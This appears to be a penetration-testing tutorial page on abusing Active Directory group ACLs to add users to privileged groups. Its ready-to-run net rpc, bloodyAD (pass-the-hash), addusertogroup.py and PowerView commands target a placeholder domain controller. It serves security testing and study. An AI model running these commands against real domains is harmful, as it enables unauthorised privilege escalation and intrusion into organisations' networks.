AddMembers

When an attacker controls a privileged user account with the ability to edit a group's member attribute, they can effectively add new users to that group - this attack is possible when the controlled account has GenericAll, GenericWrite, Self, AllExtendedRights, or Self-Membership over the target group.

Once we found the right user or group with one of these ACLs we can exploit it with the following commands

net rpc group addmem 'Vulnerable Group' otter -U domain.com/otter%'SomethingSecure123!' -S 10.10.10.10
# verify the changes took place
net rpc group members 'Vulnerable Group' -U domain.com/otter%SomethingSecure123! -S 10.10.10.10

If we only have the hash for the user we can either use the pth-toolkit or bloodyAD

bloodyAD --host "10.10.10.10" -d "domain.com" -u "otter" -p "ffffffffffffffffffffffffffffffff:<NTLM_HASH>" add groupMember groupName 'userToAdd'

We can also use the addusertogroup script

python3 addusertogroup.py -d domain.com -g "Vulnerable Group" -a otter -u otter -p 'SomethingSecure123!'

From windows we can use powerview

Add-DomainGroupMember -Identity "Vulnerable Group" -Members otter -Verbose

PreviousDACLs Enumeration NextGPO Attacks

Last updated 9 months ago